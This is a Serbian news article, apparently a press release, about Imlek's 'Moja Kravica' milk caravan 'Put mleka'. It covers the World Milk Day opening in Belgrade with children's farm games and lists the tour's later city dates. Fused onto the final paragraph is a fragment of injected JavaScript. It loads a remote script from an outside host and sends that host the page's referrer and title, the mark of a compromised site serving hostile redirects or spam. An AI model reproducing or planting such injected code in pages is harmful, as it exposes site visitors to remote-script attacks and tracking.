PUT MLEKA: Moja kravica karavan krenuo na put po Srbiji

PUT MLEKA: Moja kravica karavan krenuo na put po Srbiji


BEOGRAD, 1. jun – Moja Kravica karavan pod nazivom “Put mleka”, koji će tokom juna obilaziti gradove Srbije, započeo je svoje putovanje u Beogradu, na trgu Nikole Pašića.

Brojnim aktivnostima edukativnog karaktera i donacijama mleka i mlečnih proizvoda obeležen je 1. jun, Svetski dan mleka.

Najviše su uživali mališani zbog kojih je na trgu izgrađena specijalna postavka farme sa edukativno-zabavnim programom i igricama, poput muže krava, igre memorije, lavirinta od sena i kartoline za slikanje.

moja kravica, imlek

Cilj je bio da se deca upoznaju sa životom na farmi i procesom dobijanja mleka. Deca su na taj način mogla da nauče kako Moja Kravica mleko putuje od farme do njihovih domova. Svi mališani koji su učestvovali u igrama dobili su diplome za ostvaren uspeh u poznavanju puta mleka, kao i poklone, uz koje će im uspomene na ovu avanturu trajati zauvek.

“Kroz višedecenijsku tradiciju Moja Kravica mleko pomaže generacijama da odrastu i stasaju u zdrave i prave ljude. Kompanija Imlek organizovala je ovu manifestaciju kako bi zabavila, ali i edukovala mališane, jer njihov osmeh i zdrava budućnost treba svima da bude cilj. Moja Kravica mleko u kojem su sačuvani svi hranljivi sastojci, idealno je za zdravu ishranu i odrastanje svakog deteta”, izjavila je Marija Malović, menadžer za odnose s javnošću kompanije Imlek.

Karavan “Put mleka” nastaviće da obilazi gradove širom Srbije, a nakon Beograda obići će Novi Sad (4. jun), zatim Šabac (5. jun), Čačak (11. jun), Kraljevo (12. jun), Kragujevac (18. jun), Kruševac (19. jun) i Niš (25. jun).s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar